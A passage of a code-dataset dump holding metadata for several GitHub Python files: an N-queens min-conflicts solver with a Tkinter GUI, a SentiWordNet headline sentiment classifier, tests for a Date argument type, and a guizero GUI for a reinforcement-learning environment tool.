"usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 104, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 105, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 119, "usage_type": "attribute"}]} +{"seq_id": "664544022", "text": "\n# Solve N-queens problem using Min-conflicts algorithm\n'''\nYOUR TASKS:\n1. Read to understand the following code \n2. Give comments on the min_conflicts() function to show your comprehensive understanding of the code\n3. (Optional) Add GUI, animation...\n'''\n\nimport random\n\n#%% Utilities:\ndef argmin_random_tie(seq, key=lambda x: x):\n \"\"\"Return a minimum element of seq; break ties at random.\"\"\"\n items = list(seq)\n random.shuffle(items) #Randomly shuffle a copy of seq.\n return min(items, key=key)\n\nclass UniversalDict:\n \"\"\"A universal dict maps any key to the same value. We use it here\n as the domains dict for CSPs in which all variables have the same domain.\n >>> d = UniversalDict(42)\n >>> d['life']\n 42\n \"\"\" \n def __init__(self, value): self.value = value\n\n def __getitem__(self, key): return self.value\n\n def __repr__(self): return '{{Any: {0!r}}}'.format(self.value)\n\n\n#%% CSP\nclass CSP():\n \"\"\"This class describes finite-domain Constraint Satisfaction Problems.\n A CSP is specified by the following inputs:\n variables A list of variables; each is atomic (e.g. int or string).\n domains A dict of {var:[possible_value, ...]} entries.\n neighbors A dict of {var:[var,...]} that for each variable lists\n the other variables that participate in constraints.\n constraints A function f(A, a, B, b) that returns true if neighbors\n A, B satisfy the constraint when they have values A=a, B=b\n \"\"\"\n\n def __init__(self, variables, domains, neighbors, constraints):\n \"\"\"Construct a CSP problem. If variables is empty, it becomes domains.keys().\"\"\"\n #super().__init__(())\n variables = variables or list(domains.keys())\n self.variables = variables\n self.domains = domains\n self.neighbors = neighbors\n self.constraints = constraints\n self.curr_domains = None\n self.nassigns = 0\n\n def assign(self, var, val, assignment):\n \"\"\"Add {var: val} to assignment; Discard the old value if any.\"\"\"\n assignment[var] = val\n self.nassigns += 1\n\n def unassign(self, var, assignment):\n \"\"\"Remove {var: val} from assignment.\n DO NOT call this if you are changing a variable to a new value;\n just call assign for that.\"\"\"\n if var in assignment:\n del assignment[var]\n\n def nconflicts(self, var, val, assignment):\n \"\"\"Return the number of conflicts var=val has with other variables.\"\"\"\n\n # Subclasses may implement this more efficiently\n def conflict(var2):\n return var2 in assignment and not self.constraints(var, val, var2, assignment[var2])\n\n return count(conflict(v) for v in self.neighbors[var])\n\n # This is for min_conflicts search \n def conflicted_vars(self, current):\n \"\"\"Return a list of variables in current assignment that are in conflict\"\"\"\n return [var for var in self.variables\n if self.nconflicts(var, current[var], current) > 0]\n\n\n#%% N-queens problem\ndef queen_constraint(A, a, B, b):\n \"\"\"Constraint is satisfied (true) if A, B are really the same variable,\n or if they are not in the same row, down diagonal, or up diagonal.\"\"\"\n return A == B or (a != b and A + a != B + b and A - a != B - b)\n\nclass NQueensCSP(CSP):\n \"\"\"\n Make a CSP for the nQueens problem for search with min_conflicts.\n Suitable for large n, it uses only data structures of size O(n).\n Think of placing queens one per column, from left to right.\n That means position (x, y) represents (var, val) in the CSP.\n The main structures are three arrays to count queens that could conflict:\n rows[i] Number of queens in the ith row (i.e. val == i)\n downs[i] Number of queens in the \\ diagonal\n such that their (x, y) coordinates sum to i\n ups[i] Number of queens in the / diagonal\n such that their (x, y) coordinates have x-y+n-1 = i\n \"\"\"\n\n def __init__(self, n):\n \"\"\"Initialize data structures for n Queens.\"\"\"\n CSP.__init__(self, list(range(n)), UniversalDict(list(range(n))),\n UniversalDict(list(range(n))), queen_constraint)\n\n self.rows = [0] * n\n self.ups = [0] * (2 * n - 1)\n self.downs = [0] * (2 * n - 1)\n\n def nconflicts(self, var, val, assignment):\n \"\"\"The number of conflicts, as recorded with each assignment.\n Count conflicts in row and in up, down diagonals. If there\n is a queen there, it can't conflict with itself, so subtract 3.\"\"\"\n n = len(self.variables)\n c = self.rows[val] + self.downs[var + val] + self.ups[var - val + n - 1]\n if assignment.get(var, None) == val:\n c -= 3\n return c\n\n def assign(self, var, val, assignment):\n \"\"\"Assign var, and keep track of conflicts.\"\"\"\n old_val = assignment.get(var, None)\n if val != old_val:\n if old_val is not None: # Remove old val if there was one\n self.record_conflict(assignment, var, old_val, -1)\n self.record_conflict(assignment, var, val, +1)\n CSP.assign(self, var, val, assignment)\n\n def unassign(self, var, assignment):\n \"\"\"Remove var from assignment (if it is there) and track conflicts.\"\"\"\n if var in assignment:\n self.record_conflict(assignment, var, assignment[var], -1)\n CSP.unassign(self, var, assignment)\n\n def record_conflict(self, assignment, var, val, delta):\n \"\"\"Record conflicts caused by addition or deletion of a Queen.\"\"\"\n n = len(self.variables)\n self.rows[val] += delta\n self.downs[var + val] += delta\n self.ups[var - val + n - 1] += delta\n\n\n#%% Min-conflicts for CSPs\n''' READ AND COMMENT to show your comprehensive understanding of the following function '''\ndef min_conflicts(csp, max_steps=100000):\n \"\"\"See Figure 6.8 for the algorithm\"\"\"\n csp.current = current = {}\n for var in csp.variables:\n value = min_conflicts_value(csp, var, current)\n csp.assign(var, value, current)\n \n for i in range(max_steps):\n conflicted = csp.conflicted_vars(current)\n if not conflicted:\n return current\n var = random.choice(conflicted)\n value = min_conflicts_value(csp, var, current)\n csp.assign(var, value, current)\n return None\n\ndef min_conflicts_value(csp, var, current):\n \"\"\"Return the value that will give var the least number of conflicts.\n If there is a tie, choose at random.\"\"\"\n return argmin_random_tie(csp.domains[var], key=lambda val: csp.nconflicts(var, val, current))\n\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom PIL import ImageTk, Image\n\ndef resize_img(img, new_width) :\n '''\n Resize an image and maintain its aspect ratio\n Input : img, new_width\n Output: new image has width = new_width\n '''\n wpercent = (new_width / float(img.size[0]))\n hsize = int((float(img.size[1]) * float(wpercent)))\n img = img.resize((int(new_width), hsize), Image.ANTIALIAS)\n\n return img\n\n#%% GUI\nclass Ui_NQueens:\n '''GUI for NQueens'''\n def __init__(self, default_no_of_queens):\n self.queen_img = 0\n self.no_of_queens = default_no_of_queens\n\n self.window = Tk()\n self.window.title(\"Solve N Queens on chessboarde with Min conflicts\")\n\n # chia window thành 2 khung left_frame và right_frame\n # tham khảo code của thành viên CommonSense: \n # link https://stackoverflow.com/questions/46522200/how-to-make-two-split-up-screen-canvas-inside-the-python-tkinter-window\n self.left_frame = Frame(self.window, borderwidth=0, relief=\"solid\")\n self.right_frame = Frame(self.window, borderwidth=0, relief=\"solid\")\n self.left_frame.pack(side=\"left\", expand=True, fill=\"both\")\n self.right_frame.pack(side=\"right\", expand=True, fill=\"both\")\n\n # Tạo canvas hiển thị bàn cờ\n self.canvas = Canvas(master=self.left_frame, width=980, height=980, background=\"black\")\n self.canvas.pack()\n\n # Tạo ra label hiện 'No of queens:'\n self.label_no_queens = Label(master=self.right_frame, text='No of queens:')\n self.label_no_queens.pack()\n\n # Tạo ra textbox số lượng quân hậu\n self.entry_no_queens = Entry(master=self.right_frame, justify='center', width = 10)\n self.entry_no_queens.insert(0, str(self.no_of_queens))\n self.entry_no_queens.bind(\"\", lambda x: self.set_no_queens(self.entry_no_queens.get()))\n self.entry_no_queens.pack()\n\n # Tạo ra button 'And or search'\n self.button_solve = Button(master=self.right_frame, text='Min conflicts', command=lambda:self.set_no_queens(self.entry_no_queens.get()))\n self.button_solve.pack()\n\n self.update_canvas()\n self.set_no_queens(self.entry_no_queens.get())\n\n def update_canvas(self, list_queens = None, black_cell_color = '#949698', while_cell_color = '#fafafa', margin = 5):\n ''' Update canvas by \"list_queens\" (if had) '''\n\n self.canvas.update()\n # lấy kích thư��c của canvas\n cell_width = (self.canvas.winfo_width() - margin * 2) / self.no_of_queens\n cell_height = (self.canvas.winfo_height() - margin * 2) / self.no_of_queens\n\n # chọn kích thước ô cờ\n cell_size = cell_width if (cell_height > cell_width) else cell_height\n\n x, y = margin, margin\n # vẽ các ô trên bàn cờ\n for i in range(self.no_of_queens):\n for j in range(self.no_of_queens) :\n x1, y1 = x, y\n x2, y2 = x1 + cell_size, y + cell_size\n\n # Vẽ hình chữ nhật\n # tham khảo http://zetcode.com/tkinter/drawing/\n if ((i + j) % 2 == 0) : # vẽ ô cờ trắng\n self.canvas.create_rectangle(x1, y1, x2, y2, outline=\"\", fill=while_cell_color)\n else : # vẽ ô cờ đen\n self.canvas.create_rectangle(x1, y1, x2, y2, outline=\"\", fill=black_cell_color)\n\n x = x + cell_size\n x = margin\n y = y + cell_size\n \n # Nguồn ảnh : https://www.pngbarn.com/png-image-lfeqi?__cf_chl_captcha_tk__=0ecb57416ccd4ffd0fd461e96826ebbe5443f243-1589871646-0-Ab5eix4dmDECKHvlpaA4JPSzpJveXnygc200nOx-5rzqp8EV5OfAiJnP2-rKbgScov5GqAQHG2doEqn3MJHVvVwAyz3A1zmqCldtTYs9pCHKfDJS9Gik4jQvnbdEz6rqPtG042LfSzO7ypjDuJi_2WCNYaom5-OfyggxRxdiEcVekIwTgtKftTLRvOZw7DTE3XhikKzo1Ak1J5rUxh_DdgugI8N66TBl6NpqRCHDEkO8qNM3tn2j_dPeWLGIRdm3bvDPtW3LFnFJ70XjOHjUFl6z4EbfIeiHGD6ArUMMh5kpJLljlTSUm75kApv3AHr-dD4DYY5Pd1lj7BMDF0MVsuaVLyzp769PCV3vqhdSV4qjrpzievPYGqIrJ-Jh5-g9-5E4mYzz9NawtwJVz-7G7etD3Q2ZByoxOe6YrAYyWwqUVE8SZa8sG0Z2rVtlIvDjJkVGXP4YlMKX8vk_EpdTTOTDbOLimcS5EY8Piq7GN0YBmRIa_HBxapiJwstlrgppf9YJLc7MPIk0s8PRelHGTaE\n raw_queen_img = Image.open('img\\queen.png')\n self.queen_img = ImageTk.PhotoImage(resize_img(raw_queen_img, cell_size))\n\n # hiển thị các quân hậu theo list_queens\n if (list_queens != None):\n for j in range(self.no_of_queens) :\n if (list_queens[j] != -1):\n x = margin + cell_size * j\n y = margin + cell_size * list_queens[j]\n self.canvas.create_image(x, y, anchor = NW, image=self.queen_img)\n\n def set_no_queens(self, input_value):\n '''Set no of queens by input textbox'''\n try:\n self.no_of_queens = int(input_value)\n if(self.no_of_queens < 4) :\n messagebox.showinfo(\"Lỗi\",\"Bạn phải nhập số nguyên dương lớn hơn 3\")\n return\n except ValueError:\n messagebox.showinfo(\"Lỗi\",\"Bạn phải nhập số nguyên dương lớn hơn 3\")\n return\n\n self.update_canvas()\n\n queens_problem = NQueensCSP(n=self.no_of_queens)\n min_conflicts(queens_problem, max_steps=100000); \n result = queens_problem.current\n\n if (result) :\n self.update_canvas(queens_problem.current)\n messagebox.showinfo(\"Hoàn thành\",\"Đã sắp xếp xong các quân hậu\")\n else :\n messagebox.showinfo(\"Lỗi\",\"Không sắp xếp được\")\n\n#%% Main program\ndef main():\n ui = Ui_NQueens(default_no_of_queens = 50)\n ui.window.mainloop()\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "quockhanhtn/artificial_intelligence_exercise", "sub_path": "ex6_n_queens_with_min_conflicts/ex6_main.py", "file_name": "ex6_main.py", "file_ext": "py", "file_size_in_byte": 12503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "random.shuffle", "line_number": 16, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 159, "usage_type": "call"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 182, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 255, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 255, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 256, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 256, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 271, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 271, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 274, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 274, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 285, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 285, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 287, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 287, "usage_type": "name"}]} +{"seq_id": "36994519169", "text": "# Script para executar classificação das manchetes relacionadas a ações.\n# Base: Sentiwordnet 3.0\nimport pandas as pd\nimport nltk\nimport re\nfrom pandas import DataFrame\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sqlalchemy import create_engine\n\n# Transforma scores positivos/negativos em valência\ndef create_label(row):\n return int(10*(row['PosScore'] - row['NegScore']))\n\n# Stemming\ndef stem_tokens(tokens, stemmer):\n stemmed = [stemmer.stem(item) for item in tokens]\n return(stemmed)\n\n# Tokenização\ndef tokenize(text):\n text = re.sub(\"[^a-zA-Z]\", \" \", text)\n tokens = nltk.word_tokenize(text)\n stems = stem_tokens(tokens, stemmer)\n return(stems)\n\n# Leitura do sentiwordnet 3.0 em um dataframe e manipulação dos dados.\n# Após a manipulação ficamos com as colunas na tabela: Pos Neg Word\ndf = pd.read_csv('SentiWordNet_3.0.0_20130122.txt', comment = '#', sep='\\t')\ndf.drop(df.columns[[0, 1, 5]], axis=1, inplace=True)\ndf.drop(df.tail(1).index,inplace=True)\n\n# Processamento do wordnet para obter um label único para cada palavra...\ndf['label'] = df.apply (lambda row: create_label (row),axis=1)\n\n# Test Data\nengine = create_engine('sqlite:///news.db')\ntable_name = 'news_table'\ntest_df = pd.read_sql_table(table_name, engine)\n\nstemmer = PorterStemmer()\n\nvectorizer = CountVectorizer(\n analyzer = 'word',\n tokenizer = tokenize,\n lowercase = True,\n stop_words = 'english'\n)\n\ntrain_data = df['SynsetTerms']\ntrain_labels = df['label']\ntest_data = test_df['title']\n\ntrain_vectors = vectorizer.fit_transform(train_data.values.astype('U'))\ntest_vectors = vectorizer.transform(test_data.values.astype('U'))\n\n# Classificação\nclassifier = MultinomialNB(alpha=0.01)\nclassifier.fit(train_vectors, train_labels)\nprediction = classifier.predict(test_vectors)\nprobabilities = classifier.predict_proba(test_vectors)\n\n# Output\ns = pd.Series(prediction)\nprint(s.value_counts())\n\ntest_df['valence'] = prediction \n\n# Escreve a classificação no banco de dados.\ntest_df = test_df.drop('index', axis = 1)\ntest_df.to_sql('news_table', engine, if_exists='replace')\n\n# Cria tabela para identificar o classificador empregado.\nclass_df = pd.DataFrame(['SentiwordNet'], columns=['classifier'])\nclass_df.to_sql('classifier_table', engine, if_exists='replace')", "repo_name": "fabiograssiotto/stocks_proj", "sub_path": "classify-senti.py", "file_name": "classify-senti.py", "file_ext": "py", "file_size_in_byte": 2391, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "re.sub", "line_number": 23, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.read_sql_table", "line_number": 40, "usage_type": "call"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "33250959237", "text": "\"\"\"Tests for the ``Date`` class\"\"\"\n\nimport string\nfrom argparse import ArgumentTypeError\nfrom datetime import date\nfrom unittest import TestCase\n\nfrom bank import settings\nfrom bank.cli.types import Date\n\n\nclass BlankArgument(TestCase):\n \"\"\"Test type casting behavior for blank strings\"\"\"\n\n def test_blank_string_error(self) -> None:\n \"\"\"Test an ``ArgumentTypeError`` is raised for a blank string\"\"\"\n\n with self.assertRaises(ArgumentTypeError):\n Date('')\n\n def test_whitespace_string_error(self) -> None:\n \"\"\"Test ``ArgumentTypeError`` is raised when the string is whitespace\"\"\"\n\n for char in string.whitespace:\n with self.assertRaises(ArgumentTypeError):\n Date(char)\n\n\nclass DateCasting(TestCase):\n \"\"\"Test type casting against various date formats\"\"\"\n\n def test_invalid_value_err(self) -> None:\n \"\"\"Test an ``ArgumentTypeError`` is raised for strings not representing valid dates\"\"\"\n\n with self.assertRaises(ArgumentTypeError):\n Date('this is not a date')\n\n def test_invalid_format_err(self) -> None:\n \"\"\"Test an ``ArgumentTypeError`` is raised for valid dates using the wrong string format\"\"\"\n\n test_date = date(2000, 11, 12)\n test_format = '%b %d %Y'\n\n self.assertNotEqual(test_format, settings.date_format)\n with self.assertRaises(ArgumentTypeError):\n Date(test_date.strftime(test_format))\n\n def test_valid_format(self) -> None:\n \"\"\"Test date strings matching the format in application settings are returned as date objects\"\"\"\n\n test_date = date(2000, 11, 12)\n test_date_str = test_date.strftime(settings.date_format)\n self.assertEqual(test_date, Date(test_date_str))\n", "repo_name": "pitt-crc/bank", "sub_path": "tests/cli/types/test_Date.py", "file_name": "test_Date.py", "file_ext": "py", "file_size_in_byte": 1758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 18, "usage_type": "argument"}, {"api_name": "bank.cli.types.Date", "line_number": 19, "usage_type": "call"}, {"api_name": "string.whitespace", "line_number": 24, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 25, "usage_type": "argument"}, {"api_name": "bank.cli.types.Date", "line_number": 26, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 29, "usage_type": "name"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 35, "usage_type": "argument"}, {"api_name": "bank.cli.types.Date", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "call"}, {"api_name": "bank.settings.date_format", "line_number": 44, "usage_type": "attribute"}, {"api_name": "bank.settings", "line_number": 44, "usage_type": "name"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 45, "usage_type": "argument"}, {"api_name": "bank.cli.types.Date", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 51, "usage_type": "call"}, {"api_name": "bank.settings.date_format", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bank.settings", "line_number": 52, "usage_type": "name"}, {"api_name": "bank.cli.types.Date", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "27346968574", "text": "\nfrom guizero import App, ListBox, PushButton, Box, Text, info, Slider, CheckBox\nfrom utils.simulator import Environment\nfrom os import listdir\nfrom os.path import isfile, join\nfrom training.training import Training\n\n\nclass Guizero:\n \"\"\"A simple and intuitive interface to create graphical user interfaces (GUIs)\n prova\"\"\"\n\n def __init__(self, env_width, env_height, multiplier, fake_collision_mt, door_fake_collision_mt):\n self._env_width = env_width\n self._env_height = env_height\n self._multiplier = multiplier\n self.listbox = None\n self._environment = Environment(env_width, env_height, multiplier, fake_collision_mt,\n door_fake_collision_mt)\n self.training = Training(env_width, env_height, multiplier, self._environment)\n self.green = (0, 255, 0)\n self.orange = (255, 200, 140)\n self.pink = (255, 210, 210)\n self.yellow = (255, 255, 150)\n self.light_green = (150, 255, 150)\n\n self.app = App(title=\"Procedural Environment Neuro-symbolic Agent\", width=800, height=600)\n self.menu_box = Box(self.app, layout=\"grid\", width=800, height=260)\n Box(self.menu_box, height=50, width=800, grid=[0, 0])\n Box(self.menu_box, height=20, width=800, grid=[0, 2])\n Box(self.menu_box, height=20, width=800, grid=[0, 4])\n Box(self.menu_box, height=20, width=800, grid=[0, 6])\n PushButton(self.menu_box, command=self.view_generated_envs, text=\"Visualize generated environments\",\n width=40,\n height=1, grid=[0, 1])\n PushButton(self.menu_box, command=self.go_to_sight_generation_cmd, text=\"Generate new environments\", width=30,\n height=1, grid=[0, 3])\n PushButton(self.menu_box, command=self.train_agent_cmd, text=\"Train the Agent\", width=30, height=1, grid=[0, 5])\n\n ###GPU###\n PushButton(self.menu_box, command=self.view_gpus, text=\"Check GPU Availability\",\n width=30,\n height=1, grid=[0, 7])\n self.gpu_view_box = Box(self.app, visible=False, layout=\"grid\")\n Box(self.gpu_view_box, height=40, width=50, grid=[0, 0])\n gpu_button_box = Box(self.gpu_view_box, height=40, width=300, layout=\"grid\", grid=[0, 2])\n PushButton(gpu_button_box, command=self.view_gpu_back_cmd, text=\"Back\", grid=[1, 0])\n #########\n\n self.env_view_box = Box(self.app, visible=False, layout=\"grid\")\n Box(self.env_view_box, height=40, width=50, grid=[0, 0])\n view_button_box = Box(self.env_view_box, height=40, width=300, layout=\"grid\", grid=[0, 2])\n PushButton(view_button_box, command=self.view_cmd, text=\"Visualize\", grid=[0, 0])\n PushButton(view_button_box, command=self.view_env_back_cmd, text=\"Back\", grid=[1, 0])\n\n self.generation_env_box = Box(self.app, visible=False, layout=\"grid\")\n self.generation_env_box1 = Box(self.generation_env_box, visible=False, layout=\"grid\", grid=[0, 1])\n self.generation_env_box2 = Box(self.generation_env_box, visible=False, layout=\"grid\", grid=[1, 1])\n self.generation_env_button = Box(self.generation_env_box, visible=False, layout=\"grid\", grid=[0, 3])\n\n Box(self.generation_env_box, height=40, width=50, grid=[0, 0])\n Text(self.generation_env_box1, text=\"Number of bedrooms:\", grid=[0, 0], size=10, bg=self.light_green)\n self.sliderBR = Slider(self.generation_env_box1, horizontal=True, end=2, grid=[1, 0])\n self.sliderBR.__setattr__(\"bg\", self.light_green)\n\n Text(self.generation_env_box2, text=\"MAX beds:\", grid=[0, 0], size=10, bg=self.light_green)\n self.sliderBR_B = Slider(self.generation_env_box2, horizontal=True, end=2, grid=[1, 0])\n Text(self.generation_env_box2, text=\"MAX cabinets:\", grid=[0, 1], size=10, bg=self.light_green)\n self.sliderBR_W = Slider(self.generation_env_box2, horizontal=True, end=2, grid=[1, 1])\n\n Box(self.generation_env_box1, height=40, width=50, grid=[0, 1])\n\n Text(self.generation_env_box1, text=\"Number of bathrooms:\", grid=[0, 2], size=10, bg=self.pink)\n self.sliderBAR = Slider(self.generation_env_box1, horizontal=True, end=2, grid=[1, 2])\n self.sliderBAR.__setattr__(\"bg\", self.pink)\n Text(self.generation_env_box2, text=\"MAX water:\", grid=[0, 2], size=10, bg=self.pink)\n self.sliderBAR_T = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 2])\n Text(self.generation_env_box2, text=\"MAX showers:\", grid=[0, 3], size=10, bg=self.pink)\n self.sliderBAR_S = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 3])\n Text(self.generation_env_box2, text=\"MAX sinks:\", grid=[0, 4], size=10, bg=self.pink)\n self.sliderBAR_SI = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 4])\n\n Box(self.generation_env_box1, height=40, width=50, grid=[0, 3])\n\n Text(self.generation_env_box1, text=\"Number of kitchens:\", grid=[0, 4], size=10, bg=self.yellow)\n self.sliderKI = Slider(self.generation_env_box1, horizontal=True, end=2, grid=[1, 4])\n self.sliderKI.__setattr__(\"bg\", self.yellow)\n\n Text(self.generation_env_box2, text=\"MAX tables:\", grid=[0, 5], size=10, bg=self.yellow)\n self.sliderKI_KTA = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 5])\n Text(self.generation_env_box2, text=\"MAX balconies:\", grid=[0, 6], size=10, bg=self.yellow)\n self.sliderKI_D = Slider(self.generation_env_box2, horizontal=True, end=3, grid=[1, 6])\n\n Box(self.generation_env_box1, height=40, width=50, grid=[0, 5])\n\n Text(self.generation_env_box1, text=\"Number of halls:\", grid=[0, 6], size=10, bg=self.orange)\n self.sliderHA = Slider(self.generation_env_box1, horizontal=True, start=1, end=1, grid=[1, 6])\n self.sliderHA.__setattr__(\"bg\", self.orange)\n\n Text(self.generation_env_box2, text=\"MAX tables:\", grid=[0, 7], size=10, bg=self.orange)\n self.sliderHA_HT = Slider(self.generation_env_box2, horizontal=True, end=1, grid=[1, 7])\n Text(self.generation_env_box2, text=\"MAX sofa:\", grid=[0, 8], size=10, bg=self.orange)\n self.sliderHA_SO = Slider(self.generation_env_box2, horizontal=True, end=2, grid=[1, 8])\n Text(self.generation_env_box2, text=\"MAX shelves:\", grid=[0, 9], size=10, bg=self.orange)\n self.sliderHA_CB = Slider(self.generation_env_box2, horizontal=True, end=2, grid=[1, 9])\n\n Box(self.generation_env_box, height=40, width=50, grid=[0, 2])\n\n PushButton(self.generation_env_button, command=self.generate_cmd, text=\"Generate Environments\", grid=[0, 0])\n PushButton(self.generation_env_button, command=self.view_generation_back_cmd, text=\"Back\", grid=[1, 0])\n\n self.train_box_view = Box(self.app, visible=False, layout=\"grid\")\n env_files = [f for f in listdir(\"./environments\") if isfile(join(\"./environments\", f)) and f != \"null\"]\n env_files = sorted(env_files)\n self.listbox2 = ListBox(self.train_box_view, items=env_files, scrollbar=True, width=350, height=350,\n grid=[0, 1])\n self.render_on = CheckBox(self.train_box_view, text=\"Render On\", grid=[0, 3])\n self.render_on.toggle()\n self.logic_drive_on = CheckBox(self.train_box_view, text=\"Logic Drive On\", grid=[0, 4])\n self.video_rec_on = CheckBox(self.train_box_view, text=\"Video REC On\", grid=[0, 5])\n Box(self.train_box_view, height=40, width=50, grid=[0, 0])\n view_button_box2 = Box(self.train_box_view, layout=\"grid\", grid=[0, 2])\n PushButton(view_button_box2, command=self.train_cmd, text=\"Train\", grid=[0, 0])\n PushButton(view_button_box2, command=self.view_train_back_cmd, text=\"Back\", grid=[1, 0])\n\n self.app.display()\n\n def update_files(self):\n env_files = [f for f in listdir(\"./environments\") if isfile(join(\"./environments\", f)) and f != \"null\"]\n env_files = sorted(env_files)\n self.listbox = ListBox(self.env_view_box, items=env_files, scrollbar=True, width=350, height=350, grid=[0, 1])\n self.listbox2 = ListBox(self.train_box_view, items=env_files, scrollbar=True, width=350, height=350,\n grid=[0, 1])\n\n def view_generated_envs(self):\n self.update_files()\n self.menu_box.hide()\n self.env_view_box.show()\n\n def go_to_sight_generation_cmd(self):\n self.menu_box.hide()\n self.generation_env_box.show()\n self.generation_env_box1.show()\n self.generation_env_box2.show()\n self.generation_env_button.show()\n\n def train_agent_cmd(self):\n self.update_files()\n self.menu_box.hide()\n self.train_box_view.show()\n\n def view_cmd(self):\n self.training.load_model(self.listbox.value, self.render_on.value)\n self.training._env_width = self._env_width\n self.training._env_height = self._env_height\n self.training._multiplier = self._multiplier\n self._environment._rooms = self.training._rooms\n self._environment._agent = self.training._agent\n self._environment._objective = self.training._objective\n self._environment._floor = self.training._floor\n self._environment._screen = self.training._screen\n self._environment._env_width = self._env_width\n self._environment._env_height = self._env_height\n self._environment._multiplier = self._multiplier\n self._environment.display_environment(self.sliderBAR.value, self.sliderBR.value, self.sliderKI.value,\n self.sliderHA.value)\n\n def view_env_back_cmd(self):\n self.env_view_box.hide()\n self.menu_box.show()\n\n def view_generation_back_cmd(self):\n self.generation_env_box.hide()\n self.generation_env_box1.hide()\n self.generation_env_box2.hide()\n self.generation_env_button.hide()\n self.menu_box.show()\n\n def generate_cmd(self):\n info(\"Use the Generator\",\n \"- During the environments generation, press key 'S' to save an _environment and generate the next.\"\n \"\\n\\n- Press key 'N' to generate a new _environment discarding the previous.\"\n \"\\n\\n- Close PyGame to comeback to the menu.\")\n self._environment.generate_environment(self.sliderBAR.value, self.sliderBR.value, self.sliderKI.value,\n self.sliderHA.value)\n self._environment.draw_model()\n self._environment.display_environment(self.sliderBAR.value, self.sliderBR.value, self.sliderKI.value,\n self.sliderHA.value, mode=\"generate\")\n\n def train_cmd(self):\n self.training.load_model(self.listbox2.value, self.render_on.value)\n self.training.run_training(bool(self.render_on.value), bool(self.video_rec_on.value), bool(self.logic_drive_on.value))\n\n def view_train_back_cmd(self):\n self.train_box_view.hide()\n self.menu_box.show()\n\n ###GPU###\n def view_gpus(self):\n try:\n import tensorflow as tf\n gpus = [f\"{tf.config.experimental.get_device_details(gpu).get('device_name', 'unknown')} {gpu.name}\"\n for gpu in tf.config.list_physical_devices('GPU')]\n except:\n gpus = []\n self.listbox_gpu = ListBox(self.gpu_view_box, items=gpus, scrollbar=True, width=350, height=350, grid=[0, 1])\n self.menu_box.hide()\n self.gpu_view_box.show()\n\n #########\n ###GPU###\n def view_gpu_back_cmd(self):\n self.gpu_view_box.hide()\n self.menu_box.show()\n #########\n\n\nif __name__ == \"__main__\":\n Guizero(15.0, 15.0, 8.5, 2.5, 1.5)\n", "repo_name": "andrearafanelli/Neural-Logic-Reinforcement-Learning", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11771, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "utils.simulator.Environment", "line_number": 18, "usage_type": "call"}, {"api_name": "training.training.Training", "line_number": 20, "usage_type": "call"}, {"api_name": "guizero.App", "line_number": 27, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 28, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 29, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 30, "usage_type": "call"}, {"api_name": "guizero.Box", "line_number": 31, "usage_type": "call"}, {"api_name": "guizero.Box", 